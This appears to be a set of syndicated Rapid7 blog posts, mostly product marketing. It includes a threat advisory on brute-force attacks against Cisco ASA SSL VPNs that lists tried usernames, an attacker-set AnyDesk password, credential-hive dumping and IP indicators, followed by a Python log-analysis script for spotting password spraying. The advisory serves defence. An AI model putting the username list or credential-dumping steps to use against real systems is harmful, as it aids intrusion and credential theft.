Rapid7 MDR: Full coverage, single trusted partner

A Gartner study found that 75% of organizations pursued security vendor consolidation in 2022, up from 29% in 2020. And we understand why. Rapid environment expansion and constantly escalating threats—combined with a growing skills gap—have left security professionals on their heels and over-indexed on reactive measures alone. Adoption of point solutions to keep up with change has resulted in more noise, inefficiency, and burnout. Previous SecOps approaches are broken – there has to be change.

Rapid7 tackles complexity head-on with a more proactive approach to security operations. By unifying relevant exposure management, external threat intelligence, and now prevention capabilities we are able to get ahead of risk and eliminate breaches earlier. This also reduces the noise and alerts downstream, enabling high efficacy threat detection, and accelerated response. With Rapid7, customers can feel confident they are covered from endpoint to the cloud, across both known and unknown threats.

While the attack surface grows, endpoints remain a critical foot in the door and target for attackers. Rapid7 delivers full threat lifecycle coverage on the endpoint via our lightweight agent, including:

  • Anticipate threats to prevent breaches earlier with leading vulnerability management and Next-Gen Antivirus.
  • Rich telemetry, unique intelligence, and curated content drives high efficacy detections.
  • Full kill chain visibility and streamlined automation contain threats faster than ever.
  • Robust forensic insights for expedited investigations and advanced hunting powered by Velociraptor.

Looking Ahead: Proactive Ransomware Prevention

As Rapid7 continues to invest in the most complete endpoint solutions, it will be addressing one of the most pervasive threats organizations face today: ransomware. Leveraging a patented approach from the integrated Minerva technology, these future capabilities will be able to recognize the earliest signals and behaviors to identify and intercept headline-making attacks before they are able to execute.

Rapid7’s incident response team is currently using this technology in the field, and soon these powerful capabilities will be available to Rapid7 MDR customers. You can learn more about how Rapid7 protects endpoints here.

Unlock Broader Detections and Forensics with Velociraptor in Rapid7 XDR

Post Syndicated from Shanna Battaglia original https://blog.rapid7.com/2023/09/29/unlock-broader-detections-forensics-with-velociraptor-in-rapid7-xdr/

Unlock Broader Detections and Forensics with Velociraptor in Rapid7 XDR

Nearly 70% of companies that are breached are likely to get breached again within twelve months (CPO). Effective remediation and addressing attacks at the root is key to staying ahead of threats and recurring breaches on the endpoint. Strong Digital Forensics and Incident Response (DFIR) ready to go when any incident occurs is a critical piece of a security team’s toolkit and drives successful response and remediation.

With this in mind, we’re excited to announce the integration of Velociraptor, Rapid7’s leading open-source DFIR framework, into the Insight Platform for InsightIDR Ultimate users — all with no additional deployment or configurations required. Already utilized in the field by our Incident Response experts on behalf of Managed Detection and Response (MDR) customers, InsightIDR Ultimate users can now experience the power of Velociraptor, from daily threat monitoring and hunting to swift threat response.

Key benefits of Velociraptor in InsightIDR:

  • Hunt for threats and vulnerabilities on single endpoints or across the entire fleet conveniently within InsightIDR, enabling faster identification and remediation.
  • Leverage the latest security researcher and practitioner-contributed Artifacts (structured YAML files containing queries) from Velociraptor’s Exchange. This ensures you always have up-to-date coverage across the current threat landscape.
  • Monitor for threat activity as it occurs on the endpoint, and forward matching events to InsightIDR for in-depth investigations into potential threats.
  • Efficiently analyze all of your Velociraptor data inside of InsightIDR with the flexibility of custom Notebooks (used to track and post process hunts or collaborate on an investigation) or the visual navigation of the Virtual File System (a server side cache of the files on the endpoint).
  • Unlock expanded threat detection capabilities – like EVTX or ETW watcher plug-ins to monitor Windows event sources – with Velociraptor’s Client Monitoring feature and forward alert investigations into InsightIDR.
  • Get to the bottom of new threats quickly with the most up-to-date detections thanks to Velociraptor’s expressive query language (rather than code) that makes it faster and easier for teams to share custom detections with the open-source community.

Let’s walk through a potential scenario with InsightIDR and Velociraptor

Jo is a SOC analyst on a team that uses Rapid7 Insight products to monitor and respond to security incidents in a fleet of a few thousand endpoints. This morning, an email notification for a new InsightIDR investigation grabs Jo’s full attention – an endpoint just triggered an alert from a usually quiet detection rule named “Velociraptor – Alert.Windows.ETW.Powershell”, and the data in the preview immediately looks suspicious to Jo.

Jo jumps into InsightIDR to begin their investigation. The endpoint in question has only triggered this single alert so far. It was forwarded from Velociraptor, a recent addition to Jo’s toolset within the Rapid7 Insight Platform. The artifact was one of several they’d deployed to endpoints for continuous monitoring. While InsightIDR and the Sysmon integration could already detect suspicious PowerShell commands when included in Process Start command-line arguments, this artifact adds visibility into events logged by the Windows PowerShell ETW provider.

Jo follows the link to Velociraptor, provided in the InsightIDR Investigation. The link goes directly to the Alert.Windows.ETW.Powershell event page for the endpoint that triggered the investigation. From here, Jo starts a KAPE triage collection on this endpoint. Then they start a hunt across the entire fleet for the indicators of compromise they’ve gathered so far.

Data from Jo’s collection flows into the UI for review. After noticing an unfamiliar grandparent for Powershell in the process list, Jo decides to quarantine the endpoint. They go back to their InsightIDR tab, search for the affected endpoint, and toggle its Quarantine flag. Now that endpoint can only communicate with the Rapid7 Platform, which now includes Velociraptor.  

Among the hundreds in the hunt’s scope, a handful of endpoints return matches for Jo’s initial queries. Jo recruits a few of their teammates to help triage the results and begin deeper investigation. Between Velociraptor’s powerful DFIR capabilities and the skills of Jo’s team, the intruder will be thwarted before completing their mission.  

After the incident response concludes, Jo reviews the new Velociraptor Artifacts they created to detect this new malicious activity. They decide that a few of these will be useful submissions to the Artifact Exchange. They also take the opportunity to browse other recent additions from the DFIR community and deploy a few to their Velociraptor instance.

With Rapid7’s platform-hosted Velociraptor service, Jo’s team was able to skip another lengthy deployment process and leap right into monitoring and hunting for threats. They were also welcomed to the wider open-source Velociraptor community to share knowledge, threat intel, and DFIR techniques with the practitioners who help Velociraptor thrive.

Learn more about Velociraptor and our expanded endpoint protection.

Rapid7 Delivers Visibility Across All 19 Steps of Attack in 2023 MITRE Engenuity ATT&CK® Evaluations: Enterprise

Post Syndicated from Meaghan Buchanan original https://blog.rapid7.com/2023/09/20/rapid7-delivers-visibility-across-all-19-steps-of-attack-in-2023-mitre-engenuity/

Rapid7 Delivers Visibility Across All 19 Steps of Attack in 2023 MITRE Engenuity ATT&CK® Evaluations: Enterprise

Over seven years ago, we set out to change the way that SOCs approach threat detection and response. With the introduction of InsightIDR, we wanted to address the false positives and snowballing complexity that was burning out analysts, deteriorating security posture, and inhibiting necessary scale. We wanted to deliver a more intuitive and pragmatic approach, providing the most comprehensive coverage, with the strongest signal-to-noise. Today, as the robust XDR platform at the core of our leading MDR offering, InsightIDR has evolved to stay in front of emergent threats and expanding attack surfaces, while maintaining our commitment to eliminating the complexity and noise that distract and stall successful security teams.

Now we are proud to share our participation and results from the most recent MITRE Engenuity ATT&CK Evaluation: Enterprise, which highlights our ability to recognize advanced persistent threats early and across the kill chain, while maintaining disciplined signal-to-noise ratio to drive successful, real-world threat detection and response. You can find the detailed results and information about this evaluation on the MITRE Engenuity ATT&CK Evaluation: Enterprise website.  

What You Need to Know

There is a lot of information to parse through in these results, so here we’ve broken down the key takeaways when it comes to this evaluation.

What is MITRE Engenuity ATT&CK Evaluations?

First, a quick primer: The MITRE ATT&CK framework is a catalog and reference point for cyberattack tactics, techniques, and procedures (TTPs). The framework provides security and risk teams with a common vernacular and guide to visualize detection coverage and map out plans to strengthen defenses. MITRE Engenuity’s ATT&CK Evaluations are a vehicle for the community to understand how technologies can help defend against known adversary behaviors. In this most recent Enterprise evaluation, the focus was on emulating Turla – a sophisticated Russia-based threat group known for their targeted intrusions and innovative stealth.

Rapid7 Delivers Complete Kill Chain Coverage

InsightIDR was able to capture relevant telemetry and detections across all 19 phases of this attack, demonstrating the ability to catch the earliest threat indicators and consistently identifying evasive behaviors as the attack progressed. This year’s attack was particularly complex, evaluating a diverse range of detections and leveraging multiple forms of endpoint telemetry. While not all techniques leave remnants for incident responders to analyze, the majority leave traces – if you have the right tools to help you look for them.

To address the need for deeper visibility to identify these traces of stealthy attacker behavior – like those emulated in this evaluation – Rapid7 has leveraged Velociraptor. In addition to providing one of the premier DFIR tools to support this kind of analysis, Velociraptor also enables real-time detection that sends alerts directly into the existing InsightIDR investigation experience so analysts do not need to pivot. This is one of the emerging capabilities of Velociraptor that the vibrant open source community continues to help strengthen day in and day out. The version of Velociraptor used in this evaluation is embedded into our existing Insight Agent and is hosted by Rapid7, which benefits from all of the open source generated artifacts and crowdsourced insights of the rapidly developed community feature set.

Strongest Signal-to-Noise for Real World Efficiency

Most importantly, we approached the evaluation with the intention of showing exactly what the experience would be for an InsightIDR customer today; no messing with our Insight Agent configurations or creating new, unrealistic exceptions just for this evaluation. What you see is what you get. And consistently, when we talk to customers, they aren’t looking for technology that fires alerts on every nuanced technique or procedure. They want to know that when something bad happens they’ll be able to pinpoint the threat as early as possible, quickly understand the scope of the attack, and know what to do about it. That’s our focus, and we are thrilled to showcase it with this evaluation.

Looking Ahead: Layered Defenses to Supercharge our Agent for Future-Ready SecOps

While IT environments continue to grow in diversity and surface area, endpoint fleets remain a critical security focus as they become increasingly distributed and remain rich sources of data and proprietary information. Endpoint detections, like those showcased in this evaluation, are one important piece of the puzzle, but successful security programs must encompass layered endpoint defenses – alongside broader ecosystem coverage.

We continue to invest to provide these layered defenses with our single, lightweight Insight Agent. From expanded pre-execution prevention and proactive risk mitigation, to high-efficacy detection of known and unknown threats, to detailed investigations, forensics, response, and automated playbooks, customers trust our Insight Agent as the nucleus of their complete endpoint security. With layered defenses across cloud, network, applications, and users, we’re also ready when attacks inevitably extend beyond the endpoint.

We are grateful once again to MITRE Engenuity for the opportunity to participate in their evaluation and for their shared commitment to open intelligence sharing and transparency. If you’re looking for a transparent partner to help you kick the complexity out of your SOC and proactively stop threats across the attack surface, we would love the opportunity to help you. Learn more about how we are driving real-world security success for customers like you.

The views and opinions expressed here are those of Rapid7 and do not necessarily reflect the views or positions of any entities they represent.

Under Siege: Rapid7-Observed Exploitation of Cisco ASA SSL VPNs

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns/

Under Siege: Rapid7-Observed Exploitation of Cisco ASA SSL VPNs

Tyler Starks, Christiaan Beek, Robert Knapp, Zach Dayton, and Caitlin Condon contributed to this blog.

Rapid7’s managed detection and response (MDR) teams have observed increased threat activity targeting Cisco ASA SSL VPN appliances (physical and virtual) dating back to at least March 2023. In some cases, adversaries have conducted credential stuffing attacks that leveraged weak or default passwords; in others, the activity we’ve observed appears to be the result of targeted brute-force attacks on ASA appliances where multi-factor authentication (MFA) was either not enabled or was not enforced for all users (i.e., via MFA bypass groups). Several incidents our managed services teams have responded to ended in ransomware deployment by the Akira and LockBit groups.

There is no clear pattern among target organizations or verticals. Victim organizations varied in size and spanned healthcare, professional services, manufacturing, and oil and gas, along with other verticals. We have included indicators of compromise (IOCs) and attacker behavior observations in this blog, along with practical recommendations to help organizations strengthen their security posture against future attacks. Note: Rapid7 has not observed any bypasses or evasion of correctly configured MFA.

Rapid7 has been actively working with Cisco over the course of our investigations. On August 24, Cisco’s Product Security Incident Response Team (PSIRT) published a blog outlining attack tactics they have observed, many of which overlap with Rapid7’s observations. We thank Cisco for their collaboration and willingness to share information in service of protecting users.

Observed attacker behavior

Rapid7 identified at least 11 customers who experienced Cisco ASA-related intrusions between March 30 and August 24, 2023. Our team traced the malicious activity back to an ASA appliance servicing SSL VPNs for remote users. ASA appliance patches varied across compromised appliances — Rapid7 did not identify any particular version that was unusually susceptible to exploitation.

In our analysis of these intrusions, Rapid7 identified multiple areas of overlap among observed IOCs. The Windows clientname WIN-R84DEUE96RB was often associated with threat actor infrastructure, along with the IP addresses 176.124.201[.]200 and 162.35.92[.]242. We also saw overlap in accounts used to authenticate into internal systems, including the use of accounts TEST, CISCO, SCANUSER, and PRINTER. User domain accounts were also used to successfully authenticate to internal assets — in several cases, attackers successfully authenticated on the first try, which may indicate that the victim accounts were using weak or default credentials.

The below image is an anonymized log entry where an attacker attempts a (failed) login to the Cisco ASA SSL VPN service. In our analysis of log files across different incident response cases, we frequently observed failed login attempts occurring within milliseconds of one another, which points at automated attacks.

[Image: anonymized ASA log entry showing a failed login attempt to the SSL VPN service]

In most of the incidents we investigated, threat actors attempted to log into ASA appliances with a common set of usernames, including:

  • admin
  • adminadmin
  • backupadmin
  • kali
  • cisco
  • guest
  • accounting
  • developer
  • ftp user
  • training
  • test
  • printer
  • echo
  • security
  • inspector
  • test test
  • snmp

The above is a fairly standard list of accounts that may point at use of a brute forcing tool. In some cases, the usernames in login attempts belonged to actual domain users. While we have no specific evidence of leaked victim credentials, we are aware that it’s possible to attempt to brute force a Cisco ASA service with the path +CSCOE+/logon.htm. VPN group names are also visible in the source code of the VPN endpoint login page and can be easily extracted, which can aid brute forcing attacks.

Upon successful authentication to internal assets, threat actors deployed set.bat. Execution of set.bat resulted in the installation and execution of the remote desktop application AnyDesk, with a set password of greenday#@!. In some cases, nd.exe was executed on systems to dump NTDS.DIT, as well as the SAM and SYSTEM hives, which may have given the adversary access to additional domain user credentials. The threat actors performed further lateral movement and binary executions across other systems within target environments to increase the scope of compromise. As mentioned previously, several of the intrusions culminated in the deployment and execution of Akira or LockBit-related ransomware binaries.

Dark web activity

In parallel with incident response investigations into ASA-based intrusions, Rapid7 threat intelligence teams have been monitoring underground forums and Telegram channels for threat actor discussion about these types of attacks. In February 2023, a well-known initial access broker called “Bassterlord” was observed in XSS forums selling a guide on breaking into corporate networks. The guide, which included chapters on SSL VPN brute forcing, was being sold for $10,000 USD.

When several other forums started leaking information from the guide, Bassterlord posted on Twitter about shifting to a content rental model rather than selling the guide wholesale:

[Image: Bassterlord’s Twitter post announcing the shift to a content rental model]

Rapid7 obtained a leaked copy of the manual and analyzed its content. Notably, the author claimed they had compromised 4,865 Cisco SSL VPN services and 9,870 Fortinet VPN services with the username/password combination test:test. It’s possible that, given the timing of the dark web discussion and the increased threat activity we observed, the manual’s instruction contributed to the uptick in brute force attacks targeting Cisco ASA VPNs.

[Image: excerpt from the leaked manual]

Indicators of compromise

Rapid7 identified the following IP addresses associated with source authentication events to compromised internal assets, as well as outbound connections from AnyDesk:

  • 161.35.92.242
  • 173.208.205.10
  • 185.157.162.21
  • 185.193.64.226
  • 149.93.239.176
  • 158.255.215.236
  • 95.181.150.173
  • 94.232.44.118
  • 194.28.112.157
  • 5.61.43.231
  • 5.183.253.129
  • 45.80.107.220
  • 193.233.230.161
  • 149.57.12.131
  • 149.57.15.181
  • 193.233.228.183
  • 45.66.209.122
  • 95.181.148.101
  • 193.233.228.86
  • 176.124.201.200
  • 162.35.92.242
  • 144.217.86.109

Other IP addresses that were observed conducting brute force attempts:

  • 31.184.236.63
  • 31.184.236.71
  • 31.184.236.79
  • 194.28.112.149
  • 62.233.50.19
  • 194.28.112.156
  • 45.227.255.51
  • 185.92.72.135
  • 80.66.66.175
  • 62.233.50.11
  • 62.233.50.13
  • 194.28.115.124
  • 62.233.50.81
  • 152.89.196.185
  • 91.240.118.9
  • 185.81.68.45
  • 152.89.196.186
  • 185.81.68.46
  • 185.81.68.74
  • 62.233.50.25
  • 62.233.50.17
  • 62.233.50.23
  • 62.233.50.101
  • 62.233.50.102
  • 62.233.50.95
  • 62.233.50.103
  • 92.255.57.202
  • 91.240.118.5
  • 91.240.118.8
  • 91.240.118.7
  • 91.240.118.4
  • 161.35.92.242
  • 45.227.252.237
  • 147.78.47.245
  • 46.161.27.123
  • 94.232.43.143
  • 94.232.43.250
  • 80.66.76.18
  • 94.232.42.109
  • 179.60.147.152
  • 185.81.68.197
  • 185.81.68.75

Many of the IP addresses above were hosted by the following providers:

  • Chang Way Technologies Co. Limited
  • Flyservers S.A.
  • Xhost Internet Solutions Lp
  • NFOrce Entertainment B.V.
  • VDSina Hosting

Log-based indicators:

  • Login attempts with invalid username and password combinations (%ASA-6-113015)
  • RAVPN session creation (attempts) for unexpected profiles/TGs (%ASA-4-113019, %ASA-4-722041, %ASA-7-734003)

Mitigation guidance

As Rapid7’s mid-year threat review noted, nearly 40% of all incidents our managed services teams responded to in the first half of 2023 stemmed from lack of MFA on VPN or virtual desktop infrastructure. These incidents reinforce that use of weak or default credentials remains common, and that credentials in general are often not protected as a result of lax MFA enforcement in corporate networks.

To mitigate the risk of the attacker behavior outlined in this blog, organizations should:

  • Ensure default accounts have been disabled or passwords have been reset from the default.
  • Ensure MFA is enforced across all VPN users, limiting exceptions to this policy as much as possible.
  • Enable logging on VPNs: Cisco has information on doing this for ASA specifically here, along with guidance on collecting forensic evidence from ASA devices here.
  • Monitor VPN logs for authentication attempts occurring outside expected locations of employees.
  • Monitor VPN logs for failed authentications, looking for brute forcing and password spraying patterns.
  • As a best practice, keep current on patches for security issues in VPNs, virtual desktop infrastructure, and other gateway devices.
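The log-based indicators listed above (%ASA-6-113015 login rejections) and the guidance to monitor VPN logs for brute-forcing and password-spraying patterns can be turned into a small triage script. The following is an added example written for this page; it is not one of Rapid7’s detection rules and not Cisco code. It assumes a simplified form of the ASA 113015 syslog message (the sample lines are constructed to match that layout, and real output varies with the device’s logging settings), uses arbitrary thresholds, and seeds its watch-list with three of the brute-force source IPs listed earlier in the post.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches the timestamp, the rejected username and the client IP in a 113015
# message. Assumption: the message layout used in the constructed samples
# below; adjust the pattern for your own ASA logging/timestamp configuration.
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) .*%ASA-6-113015: .*?user = (?P<user>[^:]+?) : user IP = (?P<ip>[\d.]+)"
)

# A subset of the brute-force source IPs listed in the post's IOC section.
KNOWN_BRUTE_FORCE_SOURCES = {"62.233.50.19", "31.184.236.63", "185.81.68.45"}


def parse_line(line):
    """Return {'ts', 'user', 'ip'} for a 113015 rejection line, else None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S.%f")
    return {"ts": ts, "user": m.group("user").strip(), "ip": m.group("ip")}


def analyze(lines, window=timedelta(seconds=60), fail_threshold=5,
            spray_threshold=3, burst_gap=timedelta(milliseconds=50)):
    """Group rejections by source IP and flag suspicious patterns.

    Returns {ip: {"failures": n, "distinct_users": k, "flags": [...]}} for
    every source IP that triggered at least one flag.
    """
    by_ip = defaultdict(list)
    for ev in filter(None, map(parse_line, lines)):
        by_ip[ev["ip"]].append(ev)

    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        flags = []

        # Brute force: at least fail_threshold rejections inside one sliding window.
        j = 0
        for i in range(len(evs)):
            while j < len(evs) and evs[j]["ts"] - evs[i]["ts"] <= window:
                j += 1
            if j - i >= fail_threshold:
                flags.append("brute_force")
                break

        # Password spraying: one source cycling through many usernames.
        users = {e["user"] for e in evs}
        if len(users) >= spray_threshold:
            flags.append("password_spray")

        # Consecutive failures milliseconds apart point at tooling, not a human.
        if any(b["ts"] - a["ts"] <= burst_gap for a, b in zip(evs, evs[1:])):
            flags.append("sub_second_burst")

        if ip in KNOWN_BRUTE_FORCE_SOURCES:
            flags.append("known_ioc")

        if flags:
            findings[ip] = {"failures": len(evs), "distinct_users": len(users),
                            "flags": flags}
    return findings


def _line(ts, user, ip):
    # Constructed sample line approximating the ASA 113015 message layout.
    return (f"{ts} asa-vpn01 %ASA-6-113015: AAA user authentication Rejected : "
            f"reason = Invalid password : local database : user = {user} : user IP = {ip}")


# Constructed sample log: one automated run from a listed IOC IP, one user who
# mistyped a password twice, and a slow spray from an unlisted address.
SAMPLE_LOG = [
    _line("2023-08-01 09:15:00.000", "admin", "62.233.50.19"),
    _line("2023-08-01 09:15:00.020", "cisco", "62.233.50.19"),
    _line("2023-08-01 09:15:00.041", "test", "62.233.50.19"),
    _line("2023-08-01 09:15:00.063", "test test", "62.233.50.19"),
    _line("2023-08-01 09:15:00.085", "printer", "62.233.50.19"),
    _line("2023-08-01 09:15:00.107", "snmp", "62.233.50.19"),
    _line("2023-08-01 09:20:10.000", "jsmith", "198.51.100.7"),
    _line("2023-08-01 09:20:40.000", "jsmith", "198.51.100.7"),
    _line("2023-08-01 09:30:00.000", "guest", "203.0.113.9"),
    _line("2023-08-01 09:30:40.000", "backupadmin", "203.0.113.9"),
    _line("2023-08-01 09:31:20.000", "security", "203.0.113.9"),
]

if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        print(ip, info)
```

The thresholds are deliberately separate so each pattern can be tuned on its own: a handful of failures from one address is normal, but the same address rotating through generic usernames, or failing several times within milliseconds, is the automation signature the post describes. Feeding the script real ASA syslog requires only adjusting LINE_RE to your timestamp and device-id format.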

Rapid7 is monitoring MDR customers for anomalous authentication events and signs of brute forcing and password spraying. For InsightIDR and MDR customers, the following non-exhaustive list of detection rules are deployed and alerting on activity related to the attack patterns in this blog:

  • Ingress Auth by Local ASA Account
  • Attacker Technique – NTDS File Access
  • Attacker Tool – Impacket Lateral Movement
  • Process Spawned By SoftPerfect Network Scanner
  • Execution From Root of ProgramData

Various sources have recently published pieces noting that ransomware groups appear to be targeting Cisco VPNs to gain access to corporate networks. Rapid7 strongly recommends reviewing the IOCs and related information in this blog and in Cisco’s PSIRT blog and taking action to strengthen security posture for VPN implementations.

Healthcare Orgs: Do You Need an Outsourced SOC?

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/05/24/healthcare-orgs-do-you-need-an-outsourced-soc/

Healthcare Orgs: Do You Need an Outsourced SOC?

Gartner predicts that 50% of organizations will partner with an external MDR (Managed Detection and Response) service by 2025 for around-the-clock monitoring. What determines where healthcare organizations fall on that 50/50 split over using an outsourced SOC? It usually comes down to their ability to adapt to the current needs of the healthcare industry.

A growing demand for improved healthcare services means more healthcare providers are turning to the cloud. But for a world built on strict regulations and literal life-or-death situations, migrating too quickly to the cloud can be a serious challenge. When healthcare teams take on cloud adoption too fast, they run the risk of:

  • Accumulating cloud services that fall through security cracks—AKA shadow IT
  • Expanding their organization’s attack surface without a means of defense, opening up more opportunities for breaches and leaks

That’s where the help of an outsourced SOC comes in. With an extra team of experts on board, healthcare organizations can secure new ephemeral environments—without putting their security teams through resource strain or burnout.

Still, it can be tough for healthcare organizations to identify when it’s time to outsource, if ever at all. Here are some tell-tale signs that outsourcing a SOC and investing in managed services is the right call.

Your Teams Are Already Overwhelmed

While most healthcare organizations have a trusted team of a few security experts, they’re usually smaller than most security teams in tech enterprises, snappy startups, or other more cyber-savvy industries. That leads to a tricky cycle of needing to do more with fewer resources.

A day in the life of a security engineer in healthcare is marked by a seemingly endless game of catchup—one that doesn’t support speed, efficiency, or a successful migration to the cloud.

If your organization’s security teams are:

  • Struggling to find qualified talent
  • Overwhelmed by firefighting every single incident on their plate
  • Tired of combing through seas of alerts—some of which are false positives
  • Burned out by carrying out repetitive and mundane tasks that could be automated

You’re Super New to the Cloud

Healthcare security teams are typically IT or network pros who are well-acquainted and well-trained to defend traditional environments. However, there may be knowledge gaps when it comes to healthcare’s approach to cloud security. But with global cyber attacks on healthcare organizations rising 74% per week in 2022, security teams have no time to waste learning how to protect cloud environments.

Investing in the right education and training for healthcare’s traditional security pros simply takes time and effort that many organizations can’t afford to waste. But with an external SOC, security teams can:

  • Rely on cloud security experts to handle the trickiest parts of the process
  • Learn as they go with the guidance of seasoned professionals
  • Gain strategic guidance and insights to help take their security program to the next level

You’d Benefit From Automated Processes but Struggle To Implement Them

Automation is the key to boosting your cloud security program and iterating it at scale. For healthcare, automation provides the biggest benefit in ensuring that strict compliance regulations—like HIPAA—are met. That spells good news for stakeholders, who are typically most concerned with meeting standards and maintaining compliance.

With automation, security teams in healthcare can:

  • Configure guardrails ensuring new assets and environments adhere to regulations and compliance standards
  • Set up automated alerts that indicate when standards are not met

However, implementing automation, especially if your organization’s new at it, can seem like a hefty investment and a daunting task to accomplish. It’s time to enlist the help of an outsourced SOC if your security teams:

  • Have limited or no experience with automation
  • Are still manually handling a lot of rote but necessary tasks
  • Know where duties get repetitive but don’t know what to do about it

That way, external cyber experts can set up automated guardrails, teach your teams how they work, and eliminate tedious, manual work.

Next Steps With Outsourced SOCs

Organizations with limited resources and novice knowledge of the cloud can significantly benefit from teaming up with managed services. But in a sea of possible partners, knowing which experts to go with can be tough—especially when healthcare organizations have various security needs.

That’s why we built Managed Threat Complete, an always-on MDR with vulnerability management in a single subscription. Consolidate your investment in external SOCs by teaming up with our seasoned security pros today.

Learn More

For more information about healthcare cybersecurity, download our new ebook: In Healthcare (and Security) Early Detection is Key

In this eBook, you’ll learn:

  • The current state of threats in the healthcare industry
  • The top challenges in addressing those threats
  • How to overcome those challenges and implement defense strategies

Download it now!

Rapid7 Recognized as a Strong Performer in The Forrester Wave™ for MDR, Q2 2023

Post Syndicated from Jeremiah Dewey original https://blog.rapid7.com/2023/05/18/rapid7-recognized-as-a-strong-performer-in-the-forrester-wavetm-for-mdr-q2-2023/

Rapid7 Recognized as a Strong Performer in The Forrester Wave™ for MDR, Q2 2023

Rapid7 recognized amongst the top MDR providers in the industry.

As security teams try to do more with less, addressing the sprawling attack surface and monitoring the escalating threat and risk landscape, it inherently leaves them at a disadvantage. Rapid7 Managed Threat Complete empowers organizations to tip the scale back in their favor to achieve stronger security programs, end-to-end.

We are proud to be recognized amongst the top 13 vendors, as a Strong Performer, in The Forrester Wave™: Managed Detection and Response, Q2 2023. Our goal is to build upon and break the traditional views of MDR by uniting risk and threat detection and response with Managed Threat Complete to drive superior outcomes for our customers.

Complete Coverage. Single Solution. End-to-End.

Since day one, we’ve continuously been looking for new ways to support organizations in their effort to find and eliminate threats faster and more reliably. While traditional MDR services flooded organizations with noisy alerts and put resolution back on the customer, we saw a better path. Rapid7 is committed to being a true partner for our customers, detecting and responding to any threat, end-to-end, no matter how large or complex.

This year, we focused on empowering all organizations to gain complete coverage, unlocking a holistic security program—one that covers proactive, responsive, and strategic aspects of detection and response. We’ve combined two historically siloed pieces of security (risk and threats) to give organizations the complete picture. By focusing on a security program that is proactive, responsive, and strategic, you get smarter and more resilient over time—continuously strengthening your security.

Like all Rapid7 products and services, Managed Threat Complete is built by practitioners for practitioners. We truly want to empower security teams to focus on strategic work while we focus on their environment 24/7/365. With complete coverage and end-to-end detection and response, teams can feel confident that they’re always ready for what comes next.

Unlimited Incident Response

Traditional approaches to MDR focus on the responsive element of detection and response and miss the opportunity to help organizations build resilience and strengthen their security posture over time. As the market evolved, MDR providers drew lines in the sand. They chose to respond to alerts of a certain size, leaving the burden of hands-on-keyboard incident response (IR) for organizations to handle through expensive retainers or off-the-street contracts with IR consultants. We knew our customers deserved better, and we had a unique opportunity to challenge the system and provide a fully end-to-end response program.

We’ve removed boundaries to traditional MDR programs, keeping your outcomes our top priority. Rapid7 Managed Threat Complete delivers unlimited data, unlimited incident response, unlimited intelligence, and unlimited potential. From incident response with no limits, meaning no line in the sand regardless of the size and complexity, to XDR technology at the core for complete coverage, threats across your entire modern environment are eliminated.

We believe that, in addition to our approach to limitless security, the robust functionality we make accessible to customers is why Forrester gave us the highest score in the Platform Capabilities criterion.

“This has greatly increased our visibility, detection, and response capabilities for on and off-hours. The UEBA functionality of the agent is amazing as well. Overall the service is extremely valuable and well worth the price.”—Security Administrator/Analyst, Medium Enterprise Insurance Company, TechValidate

Strategic Partnership & Guidance

When it comes to partnership, we truly mean it. Work alongside global SOC experts who seamlessly act as an extension of your team from initial threat detection through triage, investigation, and response. With a Customer Advisor at your fingertips, you can further accelerate your security maturity by working in lockstep to build a strong, resilient program through regular posture reviews and program assessments.

Our MDR SOC provides context and in-depth reporting with every incident. When a forensic analysis is performed, detailed remediation and mitigation recommendations are provided to make sure organizations improve their resilience against threats over time. If a breach becomes a full scope incident response engagement, Rapid7 Incident Response consultants work with the SOC for round the clock forensic investigation, delivering your team answers to remove attackers from your environment as quickly as possible.

Forrester gave Rapid7 the highest possible scores in the Managed Investigations and Threat Hunting criteria. When it comes to threat hunting, we believe in being thorough. Rapid7 performs threat hunting on a hypothesis-driven basis—meaning our analysts (not scripts), proactively perform an analysis as new attacker behavior techniques arise. With 13 months of data stored, we’re able to dig in deep, and ensure our customers aren’t affected by the newest attacker TTPs. If we find something, our team immediately pivots into Incident Response to remove the compromise and reduce negative outcomes.

“Our program has significantly improved and I am much more confident in our overall security posture. Having the Rapid7 Managed Detection and Response team augmenting my team allows us to sleep better at night and be able to leave work knowing that we are still covered and can respond quickly if we receive an alert from the team.”—Scott Chille, CIO or equivalent IT position, Bartlett Regional Hospital, TechValidate

Consolidation for Powerful ROI

When investments are scrutinized and teams are being asked to do more with less, proving the value of a managed detection and response partner is pivotal. Teams are strained, and practitioners need consolidation to drive the efficiency necessary to be successful in today’s modern threat landscape—without sacrificing sophisticated security outcomes and the high standard for their security program. With Managed Threat Complete, organizations can drive greater efficiency and consolidation by unifying vulnerability management and managed detection and response into a single, cohesive security service.

“First off, the IDR platform is solid; great insight into what is going on in our environment. The MDR service gives us great comfort in knowing we have security engineers keeping a watchful eye on your environment as well as a resource for our internal security group. Having our main advisor/POC for monthly check-in ensures we are getting the most value out of the MDR service.”—A CISO/CSO at a Medium Enterprise – Banking, TechValidate

The Future of Detection & Response

As attackers become more pervasive and sophisticated, Rapid7 strives to close the gap for practitioners and their organizations. Our vision is to improve efficiency, efficacy, and productivity to make more sophisticated security outcomes accessible for all teams. These are a few outcomes we are driving toward in the future:

  • Enhanced Partnership: frictionless access to experts and data where, when, and how customers need it.
  • More Transparency: Ensure confidence and readiness for the modern environment, including cloud.
  • Continued Investment in Leading Detections Coverage: Maximize coverage with the Insight Agent. Enhancing endpoint investigation and hunting experience.
  • Investigation and Response: Empower faster decision making via expanded capabilities and streamlined processes.

Thank you to our customers and partners who continue to be our guiding light for our investments in our service and product. We’re excited to keep pushing the bounds of “traditional” to further empower our customers. We’ll share more around these initiatives and investments throughout the year so keep an eye out.

Rapid7 MDR Program Overview
Rapid7 MDR Buyers Guide
Gartner Market Guide for MDR
MDR vs. The Inevitable

[The Lost Bots] S03E03. The Rise of The Machines

Post Syndicated from Amy Hunt original https://blog.rapid7.com/2023/05/11/the-lost-bots-s03e03-the-rise-of-the-machines/

[The Lost Bots] S03E03. The Rise of The Machines

Artificial Intelligence (AI) is both a profound topic and now, a practical one too: cybersecurity marketers in particular are loving the letters “A” and “I.” But exactly where are we?

